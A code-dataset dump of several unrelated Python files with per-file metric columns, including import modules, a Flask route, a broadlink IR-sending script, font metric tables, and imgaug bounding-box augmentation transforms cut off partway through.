| 0
| 0.903817
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
881c6f85ce81da70cbc73822de20d22282848547
| 168
|
py
|
Python
|
lib/__init__.py
|
plemeri/UACANet
|
fdfca0d26e0c7d25e92676d451dc613af5e83f3c
|
[
"MIT"
] | 57
|
2021-07-07T06:13:03.000Z
|
2022-03-29T10:20:30.000Z
|
lib/__init__.py
|
POSTECH-IMLAB/UACANet
|
1b22572dc1e2b42f27ed06be51b6604bdff7471b
|
[
"MIT"
] | 9
|
2021-07-17T10:46:52.000Z
|
2022-03-10T15:00:57.000Z
|
lib/__init__.py
|
plemeri/UACANet
|
fdfca0d26e0c7d25e92676d451dc613af5e83f3c
|
[
"MIT"
] | 17
|
2021-07-08T04:52:19.000Z
|
2022-03-19T13:33:48.000Z
|
from lib.PraNet import PraNet
from lib.Baseline import Baseline
from lib.CANet import CANet
from lib.UACANet import UACANet
from lib.UACANet_SwinB import UACANet_SwinB
| 28
| 43
| 0.85119
| 27
| 168
| 5.222222
| 0.296296
| 0.248227
| 0.198582
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.119048
| 168
| 5
| 44
| 33.6
| 0.952703
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
882a6adfddaf407695f900bdcb549ffb21ccb08e
| 482
|
py
|
Python
|
scripts/send_packet.py
|
Darzou/broadlink-api
|
5d265a5b1a990d445e09b26067bc3c32cdb8743c
|
[
"Apache-2.0"
] | 1
|
2021-08-05T13:04:14.000Z
|
2021-08-05T13:04:14.000Z
|
scripts/send_packet.py
|
Darzou/broadlink-api
|
5d265a5b1a990d445e09b26067bc3c32cdb8743c
|
[
"Apache-2.0"
] | null | null | null |
scripts/send_packet.py
|
Darzou/broadlink-api
|
5d265a5b1a990d445e09b26067bc3c32cdb8743c
|
[
"Apache-2.0"
] | null | null | null |
import broadlink
import binascii
packet = b'2600920000012490183418101710183417341810181017101810171018101710181017101810171018101710181017101810173517341810171018101710181017341810173517101810173418101700028d1810171018101710181017101810171018341711171018101710181017101810171018101710181017101810171018101710181017101810173517341810171018000d05'
print(packet)
devices = broadlink.discover(timeout=5)
device = devices[0]
device.auth()
device.send_data(binascii.unhexlify(packet))
| 40.166667
| 312
| 0.914938
| 25
| 482
| 17.6
| 0.68
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.647948
| 0.039419
| 482
| 11
| 313
| 43.818182
| 0.302376
| 0
| 0
| 0
| 0
| 0
| 0.622407
| 0.622407
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.25
| 0
| 0.25
| 0.125
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
88acb8f1119fca4ee7587c85d71b4e303b28f01a
| 219
|
py
|
Python
|
populous/messaging/__init__.py
|
caiges/populous
|
d07094f9d6b2528d282ed99af0063002480bc00b
|
[
"BSD-3-Clause"
] | 2
|
2016-05-09T01:17:08.000Z
|
2017-07-18T23:35:01.000Z
|
populous/messaging/__init__.py
|
caiges/populous
|
d07094f9d6b2528d282ed99af0063002480bc00b
|
[
"BSD-3-Clause"
] | null | null | null |
populous/messaging/__init__.py
|
caiges/populous
|
d07094f9d6b2528d282ed99af0063002480bc00b
|
[
"BSD-3-Clause"
] | null | null | null |
#from populous.messaging.protocols.im import IMMessage, IMConnection
from populous.messaging.protocols.sms import SMSMessage
from django.core.mail import EmailMessage
# Convenient alias
#im_connection = IMConnection()
| 31.285714
| 68
| 0.840183
| 26
| 219
| 7.038462
| 0.653846
| 0.131148
| 0.229508
| 0.327869
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.091324
| 219
| 6
| 69
| 36.5
| 0.919598
| 0.520548
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ee2ff9ae8448f155f49d044c373401a26e5d9b21
| 171
|
py
|
Python
|
project/dashboard/routes.py
|
panuta/fund-dashboard
|
1d24489869cb2099073ed5f19a577f0913599524
|
[
"MIT"
] | null | null | null |
project/dashboard/routes.py
|
panuta/fund-dashboard
|
1d24489869cb2099073ed5f19a577f0913599524
|
[
"MIT"
] | null | null | null |
project/dashboard/routes.py
|
panuta/fund-dashboard
|
1d24489869cb2099073ed5f19a577f0913599524
|
[
"MIT"
] | null | null | null |
from flask import render_template
from . import dashboard_blueprint
@dashboard_blueprint.route('/')
def index():
return render_template('dashboard/dashboard.html')
| 19
| 54
| 0.783626
| 20
| 171
| 6.5
| 0.6
| 0.215385
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.116959
| 171
| 8
| 55
| 21.375
| 0.860927
| 0
| 0
| 0
| 0
| 0
| 0.146199
| 0.140351
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| true
| 0
| 0.4
| 0.2
| 0.8
| 0.4
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
ee69d2fbd744eef2a81b685399b1bb5011fb81cf
| 1,491
|
py
|
Python
|
venv/lib/python2.7/site-packages/pychart/afm/AvantGarde_Demi.py
|
Christian-Castro/castro_odoo8
|
8247fdb20aa39e043b6fa0c4d0af509462ab3e00
|
[
"Unlicense"
] | 1
|
2019-12-19T01:53:13.000Z
|
2019-12-19T01:53:13.000Z
|
venv/lib/python2.7/site-packages/pychart/afm/AvantGarde_Demi.py
|
Christian-Castro/castro_odoo8
|
8247fdb20aa39e043b6fa0c4d0af509462ab3e00
|
[
"Unlicense"
] | null | null | null |
venv/lib/python2.7/site-packages/pychart/afm/AvantGarde_Demi.py
|
Christian-Castro/castro_odoo8
|
8247fdb20aa39e043b6fa0c4d0af509462ab3e00
|
[
"Unlicense"
] | null | null | null |
# AFM font AvantGarde-Demi (path: /usr/share/fonts/afms/adobe/pagd8a.afm).
# Derived from Ghostscript distribution.
# Go to www.cs.wisc.edu/~ghost to get the Ghostcript source code.
import dir
dir.afm["AvantGarde-Demi"] = (500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 280, 280, 360, 560, 560, 860, 680, 280, 380, 380, 440, 600, 280, 420, 280, 460, 560, 560, 560, 560, 560, 560, 560, 560, 560, 560, 280, 280, 600, 600, 600, 560, 740, 740, 580, 780, 700, 520, 480, 840, 680, 280, 480, 620, 440, 900, 740, 840, 560, 840, 580, 520, 420, 640, 700, 900, 680, 620, 500, 320, 640, 320, 600, 500, 280, 660, 660, 640, 660, 640, 280, 660, 600, 240, 260, 580, 240, 940, 600, 640, 660, 660, 320, 440, 300, 600, 560, 800, 560, 580, 460, 340, 600, 340, 600, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 280, 560, 560, 160, 560, 560, 560, 560, 220, 480, 460, 240, 240, 520, 520, 500, 500, 560, 560, 280, 500, 600, 600, 280, 480, 480, 460, 1000, 1280, 500, 560, 500, 420, 420, 540, 480, 420, 480, 280, 500, 500, 360, 340, 500, 700, 340, 540, 1000, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 900, 500, 360, 500, 500, 500, 500, 480, 840, 1060, 360, 500, 500, 500, 500, 500, 1080, 500, 500, 500, 240, 500, 500, 320, 660, 1080, 600, )
| 248.5
| 1,297
| 0.623742
| 287
| 1,491
| 3.240418
| 0.226481
| 0.587097
| 0.793548
| 0.980645
| 0.33871
| 0.303226
| 0.303226
| 0.303226
| 0.303226
| 0.270968
| 0
| 0.629019
| 0.186452
| 1,491
| 5
| 1,298
| 298.2
| 0.137675
| 0.117371
| 0
| 0
| 0
| 0
| 0.011433
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 10
|
c9cb1c8c4d58be409be220548bbed99656ba923d
| 139
|
py
|
Python
|
geomstats/_backend/_common.py
|
lpereira95/geomstats
|
c63a4cf28e6c09f6a6b9926e8a712838362017ba
|
[
"MIT"
] | null | null | null |
geomstats/_backend/_common.py
|
lpereira95/geomstats
|
c63a4cf28e6c09f6a6b9926e8a712838362017ba
|
[
"MIT"
] | null | null | null |
geomstats/_backend/_common.py
|
lpereira95/geomstats
|
c63a4cf28e6c09f6a6b9926e8a712838362017ba
|
[
"MIT"
] | null | null | null |
import math as _math
from numpy import pi
def comb(n, k):
return _math.factorial(n) // _math.factorial(k) // _math.factorial(n - k)
| 17.375
| 77
| 0.683453
| 23
| 139
| 3.956522
| 0.521739
| 0.428571
| 0.307692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.18705
| 139
| 7
| 78
| 19.857143
| 0.80531
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
a0047ccb7b53bdc8ecf027146668a2e606041fdf
| 24,727
|
py
|
Python
|
dataloaders/custom_transforms.py
|
loxacom123/AutoML
|
8c5952467915f77d84705325b58b5dc9f3541d61
|
[
"MIT"
] | null | null | null |
dataloaders/custom_transforms.py
|
loxacom123/AutoML
|
8c5952467915f77d84705325b58b5dc9f3541d61
|
[
"MIT"
] | null | null | null |
dataloaders/custom_transforms.py
|
loxacom123/AutoML
|
8c5952467915f77d84705325b58b5dc9f3541d61
|
[
"MIT"
] | null | null | null |
import math
import torch
import random
import numpy as np
import torch.nn as nn
from numpy import int64 as int64
import torchvision.transforms as transforms
from imgaug import BoundingBox, BoundingBoxesOnImage
import imgaug.augmenters as iaa
from PIL import Image, ImageOps, ImageFilter
class Normalize(object):
"""Normalize a tensor image with mean and standard deviation.
Args:
mean (tuple): means for each channel.
std (tuple): standard deviations for each channel.
"""
def __init__(self, mean=(0., 0., 0.), std=(1., 1., 1.)):
self.mean = mean
self.std = std
def __call__(self, sample):
img = sample['image']
mask = sample['label']
img = np.array(img).astype(np.float32)
mask = np.array(mask).astype(np.float32)
img /= 255.0
img -= self.mean
img /= self.std
return {'image': img,
'label': mask}
class ToTensor(object):
"""Convert ndarrays in sample to Tensors."""
def __call__(self, sample):
# swap color axis because
# numpy image: H x W x C
# torch image: C X H X W
img = sample['image']
mask = sample['label']
img = np.array(img).astype(np.float32).transpose((2, 0, 1))
mask = np.array(mask).astype(np.float32)
img = torch.from_numpy(img).float()
mask = torch.from_numpy(mask).float()
return {'image': img,
'label': mask}
class RandomHorizontalFlip(object):
def __call__(self, sample):
img = sample['image']
mask = sample['label']
if random.random() < 0.5:
img = img.transpose(Image.FLIP_LEFT_RIGHT)
mask = mask.transpose(Image.FLIP_LEFT_RIGHT)
return {'image': img,
'label': mask}
class Translate_Y(object):
def __init__(self, v):
self.v = v # -0.3 - 0.3 ??
def __call__(self, sample):
img, annot = sample['img'], sample['annot']
bbs = BoundingBoxesOnImage(
[BoundingBox(x1=ann[0], y1=ann[1], x2=ann[2], y2=ann[3], label=str(int(ann[4]))) for ann in annot],
shape=img.shape)
aug = iaa.geometric.TranslateY(percent=self.v)
img_aug, bbs_aug = aug(image=img, bounding_boxes=bbs)
annot_aug = np.array([[bb.x1, bb.y1, bb.x2, bb.y2, np.float32(bb.label)] for bb in bbs_aug])
# the shape has to be at least (0,5)
if len(annot_aug) == 0:
annot_aug = np.zeros((0,5))
return {'img': img_aug, 'annot': annot_aug}
#TODO: Enhance this function so bounding boxes will account for change in actual object,
# i.e. if the translateY bbox moves the object up, the lower limit of the bbox should move up
class Translate_Y_BBoxes(object):
def __init__(self, v):
self.v = v
def __call__(self, sample):
img, annot = sample['img'], sample['annot']
unique_labels = np.unique(annot[:, 4].astype('int').astype('str')).tolist()
bbs = BoundingBoxesOnImage(
[BoundingBox(x1=ann[0], y1=ann[1], x2=ann[2], y2=ann[3], label=str(int(ann[4]))) for ann in annot],
shape=img.shape)
aug = iaa.BlendAlphaBoundingBoxes(labels=unique_labels, foreground=iaa.geometric.TranslateY(percent=self.v))
img_aug, bbs_aug = aug(image=img, bounding_boxes=bbs)
annot_aug = np.array([[bb.x1, bb.y1, bb.x2, bb.y2, np.float32(bb.label)] for bb in bbs_aug])
# the shape has to be at least (0,5)
if len(annot_aug) == 0:
annot_aug = np.zeros((0,5))
return {'img': img_aug, 'annot': annot_aug}
class Translate_X(object):
def __init__(self, v):
self.v = v
def __call__(self, sample):
img, annot = sample['img'], sample['annot']
bbs = BoundingBoxesOnImage(
[BoundingBox(x1=ann[0], y1=ann[1], x2=ann[2], y2=ann[3], label=str(int(ann[4]))) for ann in annot],
shape=img.shape)
aug = iaa.geometric.TranslateX(percent=self.v)
img_aug, bbs_aug = aug(image=img, bounding_boxes=bbs)
annot_aug = np.array([[bb.x1, bb.y1, bb.x2, bb.y2, np.float32(bb.label)] for bb in bbs_aug])
# the shape has to be at least (0,5)
if len(annot_aug) == 0:
annot_aug = np.zeros((0,5))
return {'img': img_aug, 'annot': annot_aug}
class Translate_X_BBoxes(object):
def __init__(self, v):
self.v = v
def __call__(self, sample):
img, annot = sample['img'], sample['annot']
unique_labels = np.unique(annot[:, 4].astype('int').astype('str')).tolist()
bbs = BoundingBoxesOnImage(
[BoundingBox(x1=ann[0], y1=ann[1], x2=ann[2], y2=ann[3], label=str(int(ann[4]))) for ann in annot],
shape=img.shape)
aug = iaa.BlendAlphaBoundingBoxes(labels=unique_labels, foreground=iaa.geometric.TranslateX(percent=self.v))
img_aug, bbs_aug = aug(image=img, bounding_boxes=bbs)
annot_aug = np.array([[bb.x1, bb.y1, bb.x2, bb.y2, np.float32(bb.label)] for bb in bbs_aug])
# the shape has to be at least (0,5)
if len(annot_aug) == 0:
annot_aug = np.zeros((0,5))
return {'img': img_aug, 'annot': annot_aug}
class CutOut(object):
def __init__(self, v):
self.v = v # between 6 - 20
def __call__(self, sample):
img, annot = sample['img'], sample['annot']
bbs = BoundingBoxesOnImage(
[BoundingBox(x1=ann[0], y1=ann[1], x2=ann[2], y2=ann[3], label=str(int(ann[4]))) for ann in annot],
shape=img.shape)
aug = iaa.Cutout(nb_iterations=int(round(self.v)), size=0.05, fill_mode="gaussian")
img_aug, bbs_aug = aug(image=img, bounding_boxes=bbs)
annot_aug = np.array([[bb.x1, bb.y1, bb.x2, bb.y2, np.float32(bb.label)] for bb in bbs_aug])
# the shape has to be at least (0,5)
if len(annot_aug) == 0:
annot_aug = np.zeros((0,5))
return {'img': img_aug, 'annot': annot_aug}
class CutOut_BBoxes(object):
def __init__(self, v):
self.v = v #self.v should be between 6 - 20
def __call__(self, sample):
img, annot = sample['img'], sample['annot']
unique_labels = np.unique(annot[:, 4].astype('int').astype('str')).tolist()
bbs = BoundingBoxesOnImage(
[BoundingBox(x1=ann[0], y1=ann[1], x2=ann[2], y2=ann[3], label=str(int(ann[4]))) for ann in annot],
shape=img.shape)
aug = iaa.BlendAlphaBoundingBoxes(labels=unique_labels,
foreground=iaa.Cutout(nb_iterations=int(round(self.v)), size=0.05, fill_mode="gaussian"))
img_aug, bbs_aug = aug(image=img, bounding_boxes=bbs)
annot_aug = np.array([[bb.x1, bb.y1, bb.x2, bb.y2, np.float32(bb.label)] for bb in bbs_aug])
# the shape has to be at least (0,5)
if len(annot_aug) == 0:
annot_aug = np.zeros((0,5))
return {'img': img_aug, 'annot': annot_aug}
class Rotate(object):
def __init__(self, v):
self.v = v # between -30 - 30
def __call__(self, sample):
img, annot = sample['img'], sample['annot']
bbs = BoundingBoxesOnImage(
[BoundingBox(x1=ann[0], y1=ann[1], x2=ann[2], y2=ann[3], label=str(int(ann[4]))) for ann in annot],
shape=img.shape)
aug = iaa.Rotate(rotate=self.v)
img_aug, bbs_aug = aug(image=img, bounding_boxes=bbs)
annot_aug = np.array([[bb.x1, bb.y1, bb.x2, bb.y2, np.float32(bb.label)] for bb in bbs_aug])
# the shape has to be at least (0,5)
if len(annot_aug) == 0:
annot_aug = np.zeros((0,5))
return {'img': img_aug, 'annot': annot_aug}
# TODO: Figure out how to make rotate just bboxes work correctly
# class Rotate_BBoxes(object):
# def __init__(self):
# pass
#
# def __call__(self, sample):
# img, annot = sample['img'], sample['annot']
# unique_labels = np.unique(annot[:, 4].astype('int').astype('str')).tolist()
#
# bbs = BoundingBoxesOnImage(
# [BoundingBox(x1=ann[0], y1=ann[1], x2=ann[2], y2=ann[3], label=str(int(ann[4]))) for ann in annot],
# shape=img.shape)
# aug = iaa.Rotate(30)
# img_aug, bbs_aug = aug(image=img, bounding_boxes=bbs)
# rotate_bb_aug = iaa.BlendAlphaBoundingBoxes(labels=unique_labels,
# foreground=iaa.Rotate(30))
# img_rotate_bb_aug, bbs_rotate_bb_aug = rotate_bb_aug(image=img, bounding_boxes=bbs_aug)
# drawn_img = bbs_rotate_bb_aug.draw_on_image(img_rotate_bb_aug * 255, size=2, color=[0, 255., 0])
# import skimage
# skimage.io.imsave('draw10.png', drawn_img)
class ShearX(object):
def __init__(self, v):
self.v = v # between -30 - 30
def __call__(self, sample):
img, annot = sample['img'], sample['annot']
bbs = BoundingBoxesOnImage(
[BoundingBox(x1=ann[0], y1=ann[1], x2=ann[2], y2=ann[3], label=str(int(ann[4]))) for ann in annot],
shape=img.shape)
aug = iaa.ShearX(self.v)
img_aug, bbs_aug = aug(image=img, bounding_boxes=bbs)
annot_aug = np.array([[bb.x1, bb.y1, bb.x2, bb.y2, np.float32(bb.label)] for bb in bbs_aug])
# the shape has to be at least (0,5)
if len(annot_aug) == 0:
annot_aug = np.zeros((0,5))
return {'img': img_aug, 'annot': annot_aug}
class ShearX_BBoxes(object):
def __init__(self, v):
self.v = v #self.v should be between -30 - 30
def __call__(self, sample):
img, annot = sample['img'], sample['annot']
unique_labels = np.unique(annot[:, 4].astype('int').astype('str')).tolist()
bbs = BoundingBoxesOnImage(
[BoundingBox(x1=ann[0], y1=ann[1], x2=ann[2], y2=ann[3], label=str(int(ann[4]))) for ann in annot],
shape=img.shape)
aug = iaa.BlendAlphaBoundingBoxes(labels=unique_labels,
foreground=iaa.ShearX(self.v))
img_aug, bbs_aug = aug(image=img, bounding_boxes=bbs)
annot_aug = np.array([[bb.x1, bb.y1, bb.x2, bb.y2, np.float32(bb.label)] for bb in bbs_aug])
# the shape has to be at least (0,5)
if len(annot_aug) == 0:
annot_aug = np.zeros((0,5))
return {'img': img_aug, 'annot': annot_aug}
class ShearY(object):
def __init__(self, v):
self.v = v # between -30 - 30
def __call__(self, sample):
img, annot = sample['img'], sample['annot']
bbs = BoundingBoxesOnImage(
[BoundingBox(x1=ann[0], y1=ann[1], x2=ann[2], y2=ann[3], label=str(int(ann[4]))) for ann in annot],
shape=img.shape)
aug = iaa.ShearY(self.v)
img_aug, bbs_aug = aug(image=img, bounding_boxes=bbs)
annot_aug = np.array([[bb.x1, bb.y1, bb.x2, bb.y2, np.float32(bb.label)] for bb in bbs_aug])
# the shape has to be at least (0,5)
if len(annot_aug) == 0:
annot_aug = np.zeros((0,5))
return {'img': img_aug, 'annot': annot_aug}
class ShearY_BBoxes(object):
def __init__(self, v):
self.v = v #self.v should be between -30 - 30
def __call__(self, sample):
img, annot = sample['img'], sample['annot']
unique_labels = np.unique(annot[:, 4].astype('int').astype('str')).tolist()
bbs = BoundingBoxesOnImage(
[BoundingBox(x1=ann[0], y1=ann[1], x2=ann[2], y2=ann[3], label=str(int(ann[4]))) for ann in annot],
shape=img.shape)
aug = iaa.BlendAlphaBoundingBoxes(labels=unique_labels,
foreground=iaa.ShearY(self.v))
img_aug, bbs_aug = aug(image=img, bounding_boxes=bbs)
annot_aug = np.array([[bb.x1, bb.y1, bb.x2, bb.y2, np.float32(bb.label)] for bb in bbs_aug])
# the shape has to be at least (0,5)
if len(annot_aug) == 0:
annot_aug = np.zeros((0,5))
return {'img': img_aug, 'annot': annot_aug}
class Equalize(object):
def __init__(self, v):
self.v = v # not applied
def __call__(self, sample):
img, annot = sample['img'], sample['annot']
bbs = BoundingBoxesOnImage(
[BoundingBox(x1=ann[0], y1=ann[1], x2=ann[2], y2=ann[3], label=str(int(ann[4]))) for ann in annot],
shape=img.shape)
aug = iaa.AllChannelsHistogramEqualization()
img_aug, bbs_aug = aug(image=(img * 255.).astype('uint8'), bounding_boxes=bbs)
img_aug = img_aug.astype('float32') / 255.
annot_aug = np.array([[bb.x1, bb.y1, bb.x2, bb.y2, np.float32(bb.label)] for bb in bbs_aug])
# the shape has to be at least (0,5)
if len(annot_aug) == 0:
annot_aug = np.zeros((0,5))
return {'img': img_aug, 'annot': annot_aug}
class Equalize_BBoxes(object):
def __init__(self, v):
self.v = v #not applied
def __call__(self, sample):
img, annot = sample['img'], sample['annot']
unique_labels = np.unique(annot[:, 4].astype('int').astype('str')).tolist()
bbs = BoundingBoxesOnImage(
[BoundingBox(x1=ann[0], y1=ann[1], x2=ann[2], y2=ann[3], label=str(int(ann[4]))) for ann in annot],
shape=img.shape)
aug = iaa.BlendAlphaBoundingBoxes(labels=unique_labels,
foreground=iaa.AllChannelsHistogramEqualization())
img_aug, bbs_aug = aug(image=(img * 255.).astype('uint8'), bounding_boxes=bbs)
img_aug = img_aug.astype('float32') / 255.
annot_aug = np.array([[bb.x1, bb.y1, bb.x2, bb.y2, np.float32(bb.label)] for bb in bbs_aug])
# the shape has to be at least (0,5)
if len(annot_aug) == 0:
annot_aug = np.zeros((0,5))
return {'img': img_aug, 'annot': annot_aug}
class Solarize(object):
def __init__(self, v):
self.v = v # -1 - 1.
def __call__(self, sample):
img, annot = sample['img'], sample['annot']
bbs = BoundingBoxesOnImage(
[BoundingBox(x1=ann[0], y1=ann[1], x2=ann[2], y2=ann[3], label=str(int(ann[4]))) for ann in annot],
shape=img.shape)
aug = iaa.pillike.Solarize(threshold=self.v)
img_aug, bbs_aug = aug(image=(img * 2. - 1.), bounding_boxes=bbs)
annot_aug = np.array([[bb.x1, bb.y1, bb.x2, bb.y2, np.float32(bb.label)] for bb in bbs_aug])
# the shape has to be at least (0,5)
if len(annot_aug) == 0:
annot_aug = np.zeros((0,5))
img_aug = (img_aug + 1.) / 2
return {'img': img_aug, 'annot': annot_aug}
class Solarize_BBoxes(object):
def __init__(self, v):
self.v = v #-1 - 1
def __call__(self, sample):
img, annot = sample['img'], sample['annot']
unique_labels = np.unique(annot[:, 4].astype('int').astype('str')).tolist()
bbs = BoundingBoxesOnImage(
[BoundingBox(x1=ann[0], y1=ann[1], x2=ann[2], y2=ann[3], label=str(int(ann[4]))) for ann in annot],
shape=img.shape)
aug = iaa.BlendAlphaBoundingBoxes(labels=unique_labels,
foreground=iaa.pillike.Solarize(threshold=0.))
img_aug, bbs_aug = aug(image=(img * 2. - 1.), bounding_boxes=bbs)
img_aug = (img_aug + 1.) / 2
annot_aug = np.array([[bb.x1, bb.y1, bb.x2, bb.y2, np.float32(bb.label)] for bb in bbs_aug])
# the shape has to be at least (0,5)
if len(annot_aug) == 0:
annot_aug = np.zeros((0,5))
return {'img': img_aug, 'annot': annot_aug}
class Color(object):
def __init__(self, v):
self.v = v # 0.0 - 3.0
def __call__(self, sample):
img, annot = sample['img'], sample['annot']
bbs = BoundingBoxesOnImage(
[BoundingBox(x1=ann[0], y1=ann[1], x2=ann[2], y2=ann[3], label=str(int(ann[4]))) for ann in annot],
shape=img.shape)
aug = iaa.pillike.EnhanceColor(self.v)
img_aug, bbs_aug = aug(image=(img * 255.).astype('uint8'), bounding_boxes=bbs)
img_aug = img_aug.astype('float32') / 255.
annot_aug = np.array([[bb.x1, bb.y1, bb.x2, bb.y2, np.float32(bb.label)] for bb in bbs_aug])
# the shape has to be at least (0,5)
if len(annot_aug) == 0:
annot_aug = np.zeros((0,5))
return {'img': img_aug, 'annot': annot_aug}
class Color_BBoxes(object):
def __init__(self, v):
self.v = v #not applied?
def __call__(self, sample):
img, annot = sample['img'], sample['annot']
unique_labels = np.unique(annot[:, 4].astype('int').astype('str')).tolist()
bbs = BoundingBoxesOnImage(
[BoundingBox(x1=ann[0], y1=ann[1], x2=ann[2], y2=ann[3], label=str(int(ann[4]))) for ann in annot],
shape=img.shape)
aug = iaa.BlendAlphaBoundingBoxes(labels=unique_labels,
foreground=iaa.pillike.EnhanceColor(self.v))
img_aug, bbs_aug = aug(image=(img * 255.).astype('uint8'), bounding_boxes=bbs)
img_aug = img_aug.astype('float32') / 255.
annot_aug = np.array([[bb.x1, bb.y1, bb.x2, bb.y2, np.float32(bb.label)] for bb in bbs_aug])
# the shape has to be at least (0,5)
if len(annot_aug) == 0:
annot_aug = np.zeros((0,5))
return {'img': img_aug, 'annot': annot_aug}
class RandomRotate(object):
def __init__(self, degree):
self.degree = degree
def __call__(self, sample):
img, annot = sample['img'], sample['annot']
unique_labels = np.unique(annot[:, 4].astype('int').astype('str')).tolist()
rotate_degree = random.uniform(-1 * self.degree, self.degree)
bbs = BoundingBoxesOnImage(
[BoundingBox(x1=ann[0], y1=ann[1], x2=ann[2], y2=ann[3], label=str(int(ann[4]))) for ann in annot],
shape=img.shape)
aug = iaa.BlendAlphaBoundingBoxes(labels=unique_labels, foreground=iaa.geometric.TranslateY(percent=0.1))
img_aug, bbs_aug = aug(image=img, bounding_boxes=bbs)
# drawn_img = bbs_aug.draw_on_image(img_aug * 255, size=2, color=[0, 255., 0])
# import skimage
# skimage.io.imsave('draw.png', drawn_img)
# img = img.rotate(rotate_degree, Image.BILINEAR)
# mask = mask.rotate(rotate_degree, Image.NEAREST)
return {'image': img,
'label': mask}
# FLIP LR BBOXES ONLY DOESNT SEEM to WORK WITH THIS LIBRARY SO FAR
class FlipLR(object):
def __init__(self, v):
self.v = v #ignore ??
def __call__(self, sample):
img, annot = sample['img'], sample['annot']
bbs = BoundingBoxesOnImage(
[BoundingBox(x1=ann[0], y1=ann[1], x2=ann[2], y2=ann[3], label=str(int(ann[4]))) for ann in annot],
shape=img.shape)
aug = iaa.Fliplr()
img_aug, bbs_aug = aug(image=img, bounding_boxes=bbs)
annot_aug = np.array([[bb.x1, bb.y1, bb.x2, bb.y2, np.float32(bb.label)] for bb in bbs_aug])
return {'img': img_aug, 'annot': annot_aug}
# TODO: fix this later
class RandomGaussianBlur(object):
def __init__(self, _):
pass
def __call__(self, sample):
img = sample['image']
mask = sample['label']
if random.random() < 0.5:
img = img.filter(ImageFilter.GaussianBlur(
radius=random.random()))
return {'image': img,
'label': mask}
class RandomScaleCrop(object):
def __init__(self, base_size, crop_size, fill=0):
self.base_size = base_size
self.crop_size = crop_size
self.fill = fill
def __call__(self, sample):
img = sample['image']
mask = sample['label']
# random scale (short edge)
short_size = random.randint(int(self.base_size * 0.5), int(self.base_size * 2.0))
w, h = img.size
if h > w:
ow = short_size
oh = int(1.0 * h * ow / w)
else:
oh = short_size
ow = int(1.0 * w * oh / h)
img = img.resize((ow, oh), Image.BILINEAR)
mask = mask.resize((ow, oh), Image.NEAREST)
# pad crop
if short_size < self.crop_size:
padh = self.crop_size - oh if oh < self.crop_size else 0
padw = self.crop_size - ow if ow < self.crop_size else 0
img = ImageOps.expand(img, border=(0, 0, padw, padh), fill=0)
mask = ImageOps.expand(mask, border=(0, 0, padw, padh), fill=self.fill)
# random crop crop_size
w, h = img.size
x1 = random.randint(0, w - self.crop_size)
